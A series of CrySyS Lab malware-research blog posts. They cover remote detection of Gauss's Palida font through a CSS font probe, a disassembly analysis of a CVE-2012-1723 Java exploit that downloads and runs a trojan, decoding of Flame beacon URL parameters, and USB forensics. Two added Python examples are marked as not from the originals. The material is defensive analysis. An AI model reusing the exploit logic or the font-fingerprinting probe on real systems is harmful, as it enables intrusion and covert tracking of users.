Posted on Leave a comment

On the Palida Narrow mystery of Gauss malware, and possible remote detection

As you all know, Kaspersky Lab has just published a detailed tech report of the latest state-sponsored targeted threat named Gauss.

So the story of Stuxnet, Duqu (found and named by us, CrySyS Lab), Flame (yes, we had a detailed tech report on that, but we called it sKyWIper) has not stopped here, and as many have said, we currently see only the tip of the iceberg.

So the big mystery of Gauss is why Palida Narrow, a modified font with a fake copyright notice, is installed on victim computers. It seems that no exploit, shellcode or nasty payload is inside. Most likely… Then why? Do they depend on Palida Narrow? Most likely not.

One possibility is that there are other components using Palida for some reason, e.g. playing tricks with some characters on web pages to hide alerts, or similar, not really clear operations.

A very far-fetched idea is that Gauss uses the font for printed material. It actually tricks some parts of the system into substituting fonts with Palida, so any printout will contain Palida. Later, printed documents could be identified by looking at the tiny peculiarities of the font.

A third, and more probable, idea is that the Palida installation can in fact be detected remotely by web servers, thus the Palida installation is a marker to identify infected computers that visit some specially crafted web pages. We tell you how.

If you open a web page, it can contain a CSS style sheet link, which tells your browser how the text blocks on the web page should look. This style sheet can include references to font faces to be used. The font face definition can refer to a local font and also to a URL (with some limitations), in order to fetch the necessary font face if it is not installed on your system.

Let’s consider the following part of the CSS file:


@font-face {
font-family: "Palida";
src: local("Palida Narrow"),
url("palida.ttf");
}

This definition tells your browser to use the local Palida Narrow font if available and, if it is not, to call back to the web server and download a copy.

This standard behavior of the browsers makes it possible to enumerate all the fonts that are installed in your system, but particularly to pinpoint if Palida Narrow is installed.

Considering this case, if Palida is installed, your browser will simply use it for rendering the web page. If not, and only in that case, it will try to download palida.ttf. So if the web server sees no download of palida.ttf, you have Palida installed on the system.

However, there is a problem: what if palida.ttf was not downloaded because you have turned off the lookup of remote fonts in your browser, or you use some special browser? Here is a solution: let’s specify and use a surely non-existing font, like Crysysida:


@font-face {
font-family: "Crysysida";
src:
url("Crysysida.ttf");
}

  • If we have downloads for both Palida and Crysysida, then everything works great, and Palida is not installed
  • If we only see download for Crysysida, then Palida is installed on the system
  • Finally, if we see no downloads, then probably the user uses lynx or telnet to browse our webpage, or there are other circumstances that prevent the download of remote fonts.
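The three cases above, turned into the server-side logic that sorts visitors of such a test page by the font files they requested. This is an added example, not code from the original post or from the crysys.hu test site; the access-log format (Apache "common" format), the paths and the client addresses in the sample are constructed assumptions.

```python
"""Server-side verdict for the two-font probe: which font files did each visitor fetch?"""
import re
from collections import defaultdict

# Constructed access-log lines (Apache "common" format) for three visitors of the
# test page. Documentation IP addresses, assumed paths; not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Aug/2012:10:00:01 +0200] "GET /index.html HTTP/1.1" 200 1123',
    '192.0.2.10 - - [10/Aug/2012:10:00:01 +0200] "GET /palida.ttf HTTP/1.1" 200 60112',
    '192.0.2.10 - - [10/Aug/2012:10:00:02 +0200] "GET /Crysysida.ttf HTTP/1.1" 404 209',
    '192.0.2.20 - - [10/Aug/2012:10:01:15 +0200] "GET /index.html HTTP/1.1" 200 1123',
    '192.0.2.20 - - [10/Aug/2012:10:01:15 +0200] "GET /Crysysida.ttf HTTP/1.1" 404 209',
    '192.0.2.30 - - [10/Aug/2012:10:02:40 +0200] "GET /index.html HTTP/1.1" 200 1123',
    'not a log line at all',
]

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

PROBE_FONT = "palida.ttf"       # fetched only when Palida Narrow is NOT installed locally
CONTROL_FONT = "Crysysida.ttf"  # never installed anywhere, so fetched whenever remote fonts work


def font_requests(lines):
    """Map each client address to the set of probe/control font files it requested."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        fonts = seen[m["host"]]  # record the visitor even if it only fetched the page
        filename = m["path"].split("?", 1)[0].rsplit("/", 1)[-1]
        if filename in (PROBE_FONT, CONTROL_FONT):
            fonts.add(filename)
    return seen


def verdict(requested):
    """The three cases from the post, in the same order."""
    if CONTROL_FONT in requested and PROBE_FONT in requested:
        return "palida-not-installed"
    if CONTROL_FONT in requested:
        return "palida-installed"
    return "inconclusive"  # remote fonts disabled, text-mode browser, or similar


def classify(lines):
    """Verdict per client address for a batch of log lines."""
    return {host: verdict(fonts) for host, fonts in font_requests(lines).items()}


if __name__ == "__main__":
    for host, result in sorted(classify(SAMPLE_LOG).items()):
        print(host, result)
```

The response status is deliberately ignored: what matters is whether the browser asked for the file at all, and a 404 for the control font is as good a signal as a 200.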

What we detailed here is not only a possible reason for Palida having been installed on infected systems, but also a detection method for infected computers. Actually, we created a detection site for the Gauss malware that identifies Palida installations remotely. The small test site is available at http://gauss.crysys.hu

Of course the method is not bullet-proof, but it is an easy alternative check for those who cannot find the Fonts menu in the Windows Control Panel.

Final note:
CrySyS Lab currently thinks that Palida is actually a slightly modified Lucida Bright Narrow Demi Bold CE font, most likely from Bigelow and Holmes, made back in 2000, although we do not have such a sample.


On the CVE-2012-1723 based java exploit and malware sample seen at our Lab

Authors: Boldi, Gábor Pék

Our latest post on 15/07 was about a trojan dropped by a Java applet that contains a Java exploit.
The dropped trojan is a fake antivirus; here is a screenshot of it:

We found that the exploit in use was CVE-2012-1723, which is analyzed on a number of websites, like:

http://schierlm.users.sourceforge.net/CVE-2012-1723.html (detailed tech info on exploit technique)
http://www.symantec.com/connect/blogs/examination-java-vulnerability-cve-2012-1723
http://krebsonsecurity.com/2012/07/new-java-exploit-to-debut-in-blackhole-exploit-kits/ (05/07)
http://vrt-blog.snort.org/2012/07/cve-2012-1723-new-java-attack-added-to.html (09/07)
http://blog.eset.com/2012/07/10/java-the-hutt-meets-cve-2012-1723-the-evil-empire-strikes-back (10/07)

Our sample of the exploit slightly differs from the analyses above, thus we decided to disclose some more info on that.
Our sample is an applet and Java classes stored in a jar file (the creation date of the classes is 14/07/2012 14:37), namely four classes: lei, pas, sax and tee. The applet is stored in class lei.

lei gets one parameter called “nob”, which contains the URL to be downloaded and executed upon successful exploitation, as shown in the javap disassembly below.


public class lei extends java.applet.Applet {
public static java.lang.String[] twa;

public static java.lang.String kin;

public lei();
Code:
0: aload_0
1: invokespecial #1 // Method java/applet/Applet."":()V
4: return

public void init();
Code:
0: aload_0
1: pop
2: aload_0
3: ldc #2 // String nob
5: invokevirtual #3 // Method getParameter:(Ljava/lang/String;)Ljava/lang/String;
8: ldc #4 // String @
10: invokevirtual #5 // Method java/lang/String.split:(Ljava/lang/String;)[Ljava/lang/String;
13: putstatic #6 // Field twa:[Ljava/lang/String;
16: iconst_0
17: istore_1

As can be seen, the split string is stored in twa, which is used later on by the downloader class tee:


public java.lang.Object run();
Code:
0: getstatic #4 // Field lei.twa:[Ljava/lang/String;
3: astore 12

The exploitation mechanism is very similar to the samples given in the publications listed above. lei == fawd of the Symantec analysis, the main applet. It uses class pas, similar to fawc (Symantec) == C2 (ESET), for the main exploitation; in our sample it has 97 variables of type “sax” named fog1..fog97. The number of variables therefore slightly differs: Symantec and ESET both reported 99 variables, Michael ‘mihi’ Schierl talks about 100 variables.

Related part of pas:


public class pas {
static java.lang.ClassLoader fob;

sax fog1;
sax fog2;
...
sax fog95;
sax fog96;
sax fog97;

pas();
Code:
0: aload_0
1: invokespecial #1 // Method java/lang/Object."":()V
4: return

Or, if you prefer it the Java way, here is an image of a decompiled version:

Back to lei: it has a loop of 100,000 iterations, as in Mihi’s document.

Mihi writes:

Then use this class follows to confuse an object from type A to B:
Instantiate a new instance of your crafted class.
call its confuse method 100_000 times with arg null.
wait a few milliseconds to give JIT time to do its dirty work.
call the confuse method with your instance of A.

Our code:


26: iload_1
27: ldc #9 // int 100000
29: if_icmpge 44
32: aload_2
33: aconst_null
34: invokevirtual #10 // Method pas.gat:(Ljava/lang/ClassLoader;)Lsax;
37: pop
38: iinc 1, 1
41: goto 26
44: invokestatic #11 // Method java/lang/Thread.currentThread:()Ljava/lang/Thread;

So it calls pas.gat 100,000 times, then waits and confuses at offset 44:


44: invokestatic #11 // Method java/lang/Thread.currentThread:()Ljava/lang/Thread;
47: pop
48: ldc2_w #12 // long 11l
51: invokestatic #14 // Method java/lang/Thread.sleep:(J)V
54: aload_2
55: aload_0
56: invokevirtual #15 // Method java/lang/Object.getClass:()Ljava/lang/Class;
59: invokevirtual #16 // Method java/lang/Class.getClassLoader:()Ljava/lang/ClassLoader;
62: invokevirtual #10 // Method pas.gat:(Ljava/lang/ClassLoader;)Lsax;
65: astore_3
66: aload_3
67: invokestatic #17 // Method sax.urd:(Lsax;)V

As you can see, after exploitation sax.urd is called.

pas.gat works as Mihi wrote about the confusion function:

Also add a non-static confuse method that
takes a parameter of type A and returns a result of type B
returns quickly if called with a null argument
else first calls GETSTATIC and then PUTFIELD on the static field (don’t forget to push this as the receiver to the stack for the second call!)
next checks each of the instance fields and returns the first one that is not null (ASM is great for creating loops of repetitive bytecode like that)
returns null otherwise, just to make the method return a value in all cases.

In code:


sax gat(java.lang.ClassLoader);
Code:
0: aload_1
1: ifnonnull 6
4: aconst_null
5: areturn
6: getstatic #2 // Field java/lang/System.out:Ljava/io/PrintStream;
9: getstatic #3 // Field fob:Ljava/lang/ClassLoader;
12: invokevirtual #4 // Method java/io/PrintStream.print:(Ljava/lang/Object;)V
15: aload_0
16: nop
17: aload_1
18: putfield #3 // Field fob:Ljava/lang/ClassLoader;
21: aload_0
22: getfield #5 // Field fog1:Lsax;
25: ifnull 33
28: aload_0
29: getfield #5 // Field fog1:Lsax;
32: areturn
33: aload_0
34: getfield #6 // Field fog2:Lsax;
...
1181: getfield #101 // Field fog97:Lsax;
1184: areturn
1185: aconst_null
1186: areturn
}

You can see the rapid return for a null parameter, then the getstatic-putfield part and the final return, exactly as described.

The sax type of the fog variables is defined in sax.class. It contains the methods zoa, owl and urd. As we have seen, method urd is called from lei after exploitation.

urd uses the class tee to download the trojan. In the run method of tee the trojan is downloaded to the temporary directory and later started with “cmd.exe /c start” by method pis. The method hes of tee provides the download InputStream for the URL (or URLs separated by @), with the help of the goy method of lei. urd of sax not only uses tee to download and run the file; its own owl method also sets the proper permissions to fulfil its goal.

Conclusion

Our malware sample is very similar to the Maljava sample of Symantec and also to the description from Mihi, although slight differences and different naming obfuscation exist. The file to be downloaded is not hard-coded, but received as a parameter.

Corresponding files and hashes:

eb710f5b0022d35a2cbf0c539528cbb3 *jar_cache9086383559255725283.tmp
f13441dbe92c099f1589e79a8b25f2ef *lei.class
ebe346ef2e2c27c73cd5d76f68e682e6 *pas.class
b9c9522a5ba97f1aec7e0189c6b2ef71 *sax.class
d6d35282a88af5be723137f564e9cb92 *tee.class

We also share the VirusTotal results on our file. Notes on the VirusTotal results:
The McAfee name Exploit-CVE2012-1273.c should be 1723 instead of 1273.
Symantec names it Trojan.Maljava, although the file names and content of the sample described in http://www.symantec.com/connect/blogs/examination-java-vulnerability-cve-2012-1723 slightly differ.
EXP/2012-0507.CK.2 refers to CVE-2012-0507, another Java exploit: http://krebsonsecurity.com/2012/03/new-java-attack-rolled-into-exploit-packs/

Virustotal results:

SHA256:          2881310732f4464fcaf2aeb6b13533ae1be29b25637b895a1f652db6fc8c6d5a
SHA1:            5fceed49f0e9a2f7c0bc0b936660c8dbaf822125
MD5:             eb710f5b0022d35a2cbf0c539528cbb3
File size:       6.1 KB (6243 bytes)
File name:       jar_cache9086383559255725283.tmp
File type:       JAR
Tags:            jar
Detection ratio: 15 / 41
Analysis date:   2012-07-28 22:19:41 UTC (12 minutes ago)

Antivirus              Result                                      Update
nProtect               -                                           20120728
CAT-QuickHeal          -                                           20120728
McAfee                 Exploit-CVE2012-1273.c                      20120728
TheHacker              -                                           20120728
K7AntiVirus            -                                           20120728
VirusBuster            -                                           20120728
F-Prot                 -                                           20120728
Symantec               Trojan.Maljava                              20120728
Norman                 -                                           20120728
TotalDefense           -                                           20120728
TrendMicro-HouseCall   TROJ_GEN.F47V0720                           20120729
Avast                  Java:Agent-BIJ [Trj]                        20120728
eSafe                  Win32.Trojan                                20120726
ClamAV                 -                                           20120728
Kaspersky              UDS:DangerousObject.Multi.Generic           20120728
BitDefender            -                                           20120728
ViRobot                -                                           20120728
ByteHero               -                                           20120723
Sophos                 Troj/JavaBz-FT                              20120728
Comodo                 -                                           20120728
F-Secure               -                                           20120728
DrWeb                  -                                           20120728
VIPRE                  -                                           20120728
AntiVir                EXP/2012-0507.CK.2                          20120728
TrendMicro             -                                           20120728
McAfee-GW-Edition      Exploit-CVE2012-1273.c                      20120728
Emsisoft               Trojan-Downloader.Java.OpenConnection!IK    20120728
Jiangmin               -                                           20120728
Antiy-AVL              -                                           20120727
Microsoft              TrojanDownloader:Java/OpenConnection.PU     20120729
SUPERAntiSpyware       -                                           20120728
GData                  Java:Agent-BIJ                              20120728
Commtouch              -                                           20120728
AhnLab-V3              JAVA/Agent                                  20120728
VBA32                  -                                           20120727
ESET-NOD32             -                                           20120728
Rising                 -                                           20120726
Ikarus                 Trojan-Downloader.Java.OpenConnection       20120728
Fortinet               Java/JavaBz.FT!tr                           20120728
AVG                    -                                           20120728
Panda                  -                                           20120728

New java dropped malware

We are investigating a report from one of our colleagues that a website dropped malicious exe files via some Java exploit, possibly an already known one. Of course, this is not “that” important, but keep in touch on this:
Hashes
4307f1bf8d41604875d8b21c878659c0 *01388ca50e45.exe
100ad7ab0fff23a0938d5b19ede20362 *01388ca69ef2.exe
eb710f5b0022d35a2cbf0c539528cbb3 *jar_cache875449263521178018.tmp
eb710f5b0022d35a2cbf0c539528cbb3 *jar_cache9086383559255725283.tmp

Inside the jar
f13441dbe92c099f1589e79a8b25f2ef *lei.class
ebe346ef2e2c27c73cd5d76f68e682e6 *pas.class
b9c9522a5ba97f1aec7e0189c6b2ef71 *sax.class
d6d35282a88af5be723137f564e9cb92 *tee.class

Thanks for the info, K.T. (Cuby).
b.


Analysis of Flame WuSetupV.exe URL parameters

Basically the main functionality of the WuSetupV.exe of Flame is to create a special URL, download the main component of Flame using the special URL, store it and install it on the victim computer.

WuSetupV.exe structure

The most interesting topic is what type of data is stored inside the URL created by WuSetupV as it uses multiple parameters, like
GET /view.php?mp=1&jz=4073875454&fd=28369876&am=55597C801D14&ef=40474645&pr=0&ec=0&ov=666641736666417766664174pl=gspnZGygMcK0Gnng|spnZGy|nynn|0ncnn|TWvDKoKv|nGcRW0Gn|Dnann|Rya0ZjD8|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|n8KKDnR|GU8DKcGc|-2TacGCcap|RyZKKDne|RyZKKDne|aDo|Tn0vZLp|Txax0DZ|qxsGZx8-4GUg|cGoGeWZ|qxsGZx8-| HTTP/1.1

So let’s see how the parts of the URL are created.

The “jz=” parameter is created randomly, but reused if an error occurs and a second download is attempted. This means the value might be used multiple times within the same session, hence it is a session id.
The value is represented in decimal. The random generator is the well-known simple one; its main part is

.text:00403489 mov eax, dword_4053C0
.text:0040348E imul eax, 343FDh
.text:00403494 add eax, 269EC3h ;
.text:00403499 mov dword_4053C0, eax
.text:0040349E sar eax, 10h
.text:004034A1 and eax, 7FFFh

The “am=” parameter, handled around sub_401426, contains a hex string, which is bytewise xor’d with 0x55. The hex string is 48 bits long and contains the interface MAC address. In this case am=55597C801D14 refers to the 00:0c:29:d5:48:41 VMware MAC address.

The “ef=” parameter is the IP address or IP addresses (concatenated) of the client computer, most likely useful if a proxy server or NAT is used. The value is XOR’d byte-wise with 0x44 by the subroutine described below for the “ov=” parameter (loc_402A30), and represented as a hex string. In this way 0x40474645 represents the IP address 1.2.3.4.

The “ov=” parameter contains Windows version information. The string “ov=666641736666417766664174” can be separated into three 8-character hex strings:

66664173
66664177
66664174

All three parts are XOR’d with 0x66 at the end by the following simple code fragment:

.text:00402A30 loc_402A30: ; CODE XREF: xor_encr_sub_402A2E+12j
.text:00402A30 mov eax, [esp+arg_0]
.text:00402A34 mov dl, [esp+arg_4]
.text:00402A38 add eax, ecx
.text:00402A3A xor [eax], dl
.text:00402A3C inc ecx
.text:00402A3D cmp ecx, 4
.text:00402A40 jb short loc_402A30
.text:00402A42 retn

The original values are:

2715
2711
2712

All three original values have 0x2710 added to them, as follows:

.text:0040159D mov eax, [ebp+VersionInformation.dwMajorVersion]
.text:004015A3 push 66h ; int
.text:004015A5 add eax, 2710h
.text:004015AA push edi ; lpString1
.text:004015AB push eax ; int
.text:004015AC call xor_and_printf08x_sub_402A63
.text:004015B1 add esp, 0Ch
.text:004015B4 test eax, eax
.text:004015B6 jz short loc_4015FE
.text:004015B8 mov eax, [ebp+VersionInformation.dwMinorVersion]
.text:004015BE add dword ptr [esi], 8
.text:004015C1 push 66h ; int
.text:004015C3 add eax, 2710h
.text:004015C8 push edi ; lpString1
.text:004015C9 push eax ; int
.text:004015CA call xor_and_printf08x_sub_402A63
.text:004015CF add esp, 0Ch
.text:004015D2 test eax, eax
.text:004015D4 jz short loc_4015FE
.text:004015D6 mov eax, [ebp+VersionInformation.dwPlatformId]
.text:004015DC add dword ptr [esi], 8
.text:004015DF push 66h ; int
.text:004015E1 add eax, 2710h
.text:004015E6 push edi ; lpString1
.text:004015E7 push eax ; int
.text:004015E8 call xor_and_printf08x_sub_402A63

Therefore, the string above represents

dwMajorVersion = 5
dwMinorVersion = 1
dwPlatformId = 2

Here 5.1 is Windows XP, and dwPlatformId 2 is VER_PLATFORM_WIN32_NT.

The “fd=” parameter stores the StandardSize dword from HKEY_CURRENT_USER\Console or from HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry in decimal form, depending on the Windows version. In our case it is 28369876, which is 0x01B0E3D4 in hex. This registry value is not standard. If it does not exist, the StandardSize value is created by WuSetupV.exe as a random number seeded with time information and stored in the registry; the related code is the following:

.text:00403C01 call time_rnd_seed_sub_4025BF
.text:00403C06 call rndgen3_4times_sub_402637
.text:00403C0B mov [esi], eax
.text:00403C0D mov dword ptr [edi], 1
.text:00403C13 mov edx, [esi]
.text:00403C15 push edx ; Data
.text:00403C16 call set_standardsize_key_sub_403DB0

The difference between “jz=” and “fd=” is that “jz=” is a session identifier, re-used only within a single run of WuSetupV.exe, while “fd=” is a permanent id for the particular computer, stored in the registry.

Interestingly, the libclanattack Lua script also uses StandardSize, but the corresponding key is in TimeZoneInformation:

1 [-]: GETUPVAL R0 U0 ; R0 := U0
2 [-]: GETTABLE R0 R0 K0 ; R0 := R0["remoteSafety"]
3 [-]: SELF R0 R0 K1 ; R1 := R0; R0 := R0["getRegDword"]
4 [-]: LOADK R2 K2 ; R2 := "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
5 [-]: LOADK R3 K3 ; R3 := "StandardSize"
6 [-]: TAILCALL R0 4 0 ; R0,... := R0(R1,R2,R3)
7 [-]: RETURN R0 0 ; return R0,...
8 [-]: RETURN R0 1 ; return

The “pr=” parameter is set according to the existence of the StandardSize parameter. If it was found by the program, then “pr=0”, if it is the first start of the malicious WuSetupV, then “pr=1” shows to the server that this is a new installation.

WuSetupV.exe looks for the registry key
SYSTEM\CurrentControlSet\Control\TimeZoneInformation
but it is not interested in the time zone. In reality it looks for the StandardDateBias value under that key, which it later adds to the “dd=” CGI parameter in decimal form. The real reason is unknown.

The longest part of the URL, the “pl=” CGI parameter, is encoded with a simple substitution table (each character of the upper row stands for the character below it):


hXk1Qrbf6VH~29SMYAsCF-q7Omad0eGLojWi.DyvK8zcnZxRTUpwE_B5tuNPIJgl43
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-.

This way for the query

GET /view.php?mp=1&jz=4073875454&fd=28369876&am=55597C801D14&ef=40474645&pr=0&ec=0&ov=666641736666417766664174pl=gspnZGygMcK0Gnng|spnZGy|nynn|0ncnn|TWvDKoKv|nGcRW0Gn|Dnann|Rya0ZjD8|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|n8KKDnR|GU8DKcGc|-2TacGCcap|RyZKKDne|RyZKKDne|aDo|Tn0vZLp|Txax0DZ|qxsGZx8-4GUg|cGoGeWZ|qxsGZx8-| HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mshome-f3be293c
Connection: Keep-Alive

the original value of “pl=”, which contains the list of current active processes, is in this case:

_System_Process_ System smss csrss winlogon services lsass vmacthlp svchost
svchost svchost svchost svchost spoolsv explorer VMwareTray vmtoolsd vmtoolsd alg
wscntfy wuauclt WuSetupV.ex_ regedit WuSetupV

Upon unsuccessful download, WuSetupV creates a second URL and sends it to the server, like the one below:


GET /view.php?ac=1&jz=2203776806&fd=28369876&gb=0&rt=a0b0c0d HTTP/1.1

Summary of the URL parameters used by WuSetupV.exe


mp: is fixed 1 for first query
jz: session identifier
fd: computer identifier
am: MAC address of interface
ef: IP address
pr: is 0 if StandardSize already exists, pr=1 for new installations
ec: generally 0, probably some error checking related to ~DHF593.tmp file
ov: Windows version number
pl: Process list
ac: is fixed 1; used in second query
gb: 0, purpose unknown
rt: a0b0c0d, purpose unknown
dd: value of StandardDateBias, if set

TODOs:
What exactly are gb, ec, rt good for?
How is the program related to ef_trace file?
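To make the parameter analysis above concrete, here is a decoder for the “am=”, “ef=”, “ov=” and “pl=” fields plus one step of the rand()-style generator from .text:00403489. This is an added example, not code from the original post; it assumes the request line quoted above is missing an “&” before “pl=” (the constructed sample below inserts it), and it does not claim to know how the 15-bit generator outputs are combined into the 32-bit “jz=” value, which the post does not show.

```python
"""Decode the WuSetupV.exe beacon parameters explained in the post (added example)."""
import struct
from urllib.parse import parse_qs, urlsplit

# Substitution alphabet from the post. The upper (cipher) row has 66 characters and
# the lower (plain) row 65; zip() pairs only the 65 aligned columns, so the trailing
# '3' of the cipher row has no mapping and is passed through unchanged.
CIPHER_ROW = "hXk1Qrbf6VH~29SMYAsCF-q7Omad0eGLojWi.DyvK8zcnZxRTUpwE_B5tuNPIJgl43"
PLAIN_ROW = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-."
SUBST = dict(zip(CIPHER_ROW, PLAIN_ROW))

# The request quoted in the post; the '&' before pl= is inserted here (constructed sample).
SAMPLE_REQUEST = (
    "GET /view.php?mp=1&jz=4073875454&fd=28369876&am=55597C801D14&ef=40474645&pr=0&ec=0"
    "&ov=666641736666417766664174&pl=gspnZGygMcK0Gnng|spnZGy|nynn|0ncnn|TWvDKoKv|nGcRW0Gn|"
    "Dnann|Rya0ZjD8|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|n8KKDnR|GU8DKcGc|-2TacGCcap|"
    "RyZKKDne|RyZKKDne|aDo|Tn0vZLp|Txax0DZ|qxsGZx8-4GUg|cGoGeWZ|qxsGZx8-| HTTP/1.1"
)


def lcg_step(state):
    """One step of the generator at .text:00403489:
    state = state*0x343FD + 0x269EC3 (mod 2^32); output = (state >> 16) & 0x7FFF."""
    state = (state * 0x343FD + 0x269EC3) & 0xFFFFFFFF
    return state, (state >> 16) & 0x7FFF


def xor_hex_dword(hex8, key):
    """Undo xor_encr_sub_402A30 followed by printf("%08x"): a dword XOR'd byte-wise with key."""
    return int(hex8, 16) ^ (key * 0x01010101)


def decode_am(am):
    """am= : the 6 MAC address bytes XOR'd with 0x55, hex encoded."""
    raw = bytes(b ^ 0x55 for b in bytes.fromhex(am))
    return ":".join(f"{b:02x}" for b in raw)


def decode_ef(ef):
    """ef= : client IP dword(s) XOR'd with 0x44. The hex string is the little-endian
    in-memory dword, so unpack it to get the bytes back in network order."""
    addrs = []
    for i in range(0, len(ef), 8):
        dword = xor_hex_dword(ef[i:i + 8], 0x44)
        addrs.append(".".join(str(b) for b in struct.pack("<I", dword)))
    return addrs


def decode_ov(ov):
    """ov= : dwMajorVersion, dwMinorVersion, dwPlatformId, each +0x2710 then XOR 0x66."""
    return [xor_hex_dword(ov[i:i + 8], 0x66) - 0x2710 for i in range(0, len(ov), 8)]


def decode_pl(pl):
    """pl= : '|'-separated process names under the substitution table."""
    names = ["".join(SUBST.get(c, c) for c in token) for token in pl.split("|")]
    return [n for n in names if n]


def decode_beacon(request_line):
    """Parse a 'GET /view.php?... HTTP/1.1' line and decode the fields the post explains."""
    path = request_line.split(" ")[1]
    q = {k: v[0] for k, v in parse_qs(urlsplit(path).query).items()}
    fd = int(q["fd"])
    info = {"jz": int(q["jz"]), "fd": fd, "fd_hex": f"0x{fd:08X}", "pr": int(q["pr"])}
    if "am" in q:
        info["mac"] = decode_am(q["am"])
    if "ef" in q:
        info["ip"] = decode_ef(q["ef"])
    if "ov" in q:
        major, minor, platform = decode_ov(q["ov"])
        info["os"] = {"major": major, "minor": minor, "platform": platform}
    if "pl" in q:
        info["processes"] = decode_pl(q["pl"])
    return info


if __name__ == "__main__":
    for key, value in decode_beacon(SAMPLE_REQUEST).items():
        print(f"{key}: {value}")
```

The decoder reproduces the values worked out in the post: the VMware MAC 00:0c:29:d5:48:41, the address 1.2.3.4, version 5.1 on platform 2, and the 24-entry process list ending in WuSetupV. Since every field is a fixed-key XOR or a fixed substitution, the same functions work on any beacon of this form, not just the quoted one.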


Flame USB dot file confirmed

Finally we were able to do some tests, and we can confirm Bitdefender’s finding (http://labs.bitdefender.com/2012/06/flame-the-story-of-leaked-data-carried-by-human-vector/) on the USB file transfer of Flame. Again, please read our original tech report first.

If started by rundll, Flame creates the “.” file within minutes.

As the file name is very special, under Windows the easiest way to check is dir /a.
Under Linux you can use the good old Sleuth Kit:

# fls -a ./usb1
r/d 2: .
v/v 3368675: MBR
v/v 3368676: FAT1
v/v 3368677: FAT2
d/d 3368678: OrphanFiles

But given
# istat ./usb1 2
Directory Entry: 2
Allocated
File Attributes: Directory
Size: 1024
Name:

Directory Entry Times:
Written: Thu Jan 1 01:00:00 1970
Accessed: Thu Jan 1 01:00:00 1970
Created: Thu Jan 1 01:00:00 1970

Sectors:
1680 1681

Entry 2 is surely not what we are looking for. So if not entry 2, then maybe 3 or 4?

istat ./usb1 4
Directory Entry: 4
Allocated
File Attributes: File, Hidden, System, Archive
Size: 172032
Name: HUB001.DAT

Directory Entry Times:
Written: Tue Jun 12 22:13:50 2012
Accessed: Tue Jun 12 00:00:00 2012
Created: Thu Jan 1 01:00:00 1970

Sectors:
1682 1683 1684 1685 1686 1687 1688 1689
1690 1691 1692 1693 1694 1695 1696 1697
1698 1699 1700 1701 1702 1703 1704 1705
1706 1707 1708 1709 1710 1711 1712 1713
1714 1715 1716 1717 1718 1719 1720 1721
1722 1723 1724 1725 1726 1727 1728 1729
1730 1731 1732 1733 1734 1735 1736 1737
1738 1739 1740 1741 1742 1743 1744 1745
1746 1747 1748 1749 1750 1751 1752 1753
1754 1755 1756 1757 1758 1759 1760 1761
1762 1763 1764 1765 1766 1767 1768 1769
1770 1771 1772 1773 1774 1775 1776 1777
1778 1779 1780 1781 1782 1783 1784 1785
1786 1787 1788 1789 1790 1791 1792 1793
1794 1795 1796 1797 1798 1799 1800 1801
1802 1803 1804 1805 1806 1807 1808 1809
1810 1811 1812 1813 1814 1815 1816 1817
1818 1819 1820 1821 1822 1823 1824 1825
1826 1827 1828 1829 1830 1831 1832 1833
1834 1835 1836 1837 1838 1839 1840 1841
1842 1843 1844 1845 1846 1847 1848 1849
1850 1851 1852 1853 1854 1855 1856 1857
1858 1859 1860 1861 1862 1863 1864 1865
1866 1867 1868 1869 1870 1871 1872 1873
1874 1875 1876 1877 1878 1879 1880 1881
1882 1883 1884 1885 1886 1887 1888 1889
1890 1891 1892 1893 1894 1895 1896 1897
1898 1899 1900 1901 1902 1903 1904 1905
1906 1907 1908 1909 1910 1911 1912 1913
1914 1915 1916 1917 1918 1919 1920 1921
1922 1923 1924 1925 1926 1927 1928 1929
1930 1931 1932 1933 1934 1935 1936 1937
1938 1939 1940 1941 1942 1943 1944 1945
1946 1947 1948 1949 1950 1951 1952 1953
1954 1955 1956 1957 1958 1959 1960 1961
1962 1963 1964 1965 1966 1967 1968 1969
1970 1971 1972 1973 1974 1975 1976 1977
1978 1979 1980 1981 1982 1983 1984 1985
1986 1987 1988 1989 1990 1991 1992 1993
1994 1995 1996 1997 1998 1999 2000 2001
2002 2003 2004 2005 2006 2007 2008 2009
2010 2011 2012 2013 2014 2015 2016 2017

Remember the size from the dir command?

HUB001.DAT? :

00d2020: 4855 4230 3031 2020 4441 5426 0000 0000 HUB001 DAT&....
00d2030: 0000 cc40 0000 b9b1 cc40 0300 00a0 0200 ...@.....@......

Yes. But even ifind could cheat us:

ifind -a -n "HUB001.DAT" ./usb1
2

But fsstat shows the 336 sectors (of standard 512 bytes) we are looking for:

FAT CONTENTS (in sectors)

1680-1681 (2) -> EOF
1682-2017 (336) -> EOF

So let’s do:

icat-sleuthkit ./usb1 4 >hub001.dat

Great:
-rw-r--r-- 1 root root 172032 Jun 12 22:53 hub001.dat

xxd hub001.dat |less
0000000: 217a 30e6 280c b557 da53 ce11 28b5 60ea !z0.(..W.S..(.`.
0000010: 07ea 8282 ea2e b5b5 eaea eabb eaea eaea ................

OK, it’s encrypted. Get the sKyWIper tech report for reference; it is like Figure 24 on Encryption E1.

After decryption:

0000000000: 53 51 4C 69 74 65 20 66 │ 6F 72 6D 61 74 20 33 00 SQLite format 3
0000000010: 10 00 01 01 00 40 20 20 │ 00 00 00 38 00 00 00 00 ► ☺☺ @ 8
0000000020: 00 00 00 00 00 00 00 00 │ 00 00 00 0D 00 00 00 03 ♪ ♥
0000000030: 00 00 00 00 00 00 00 0E │ 00 00 00 01 00 00 00 00 ♫ ☺
0000000040: 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00

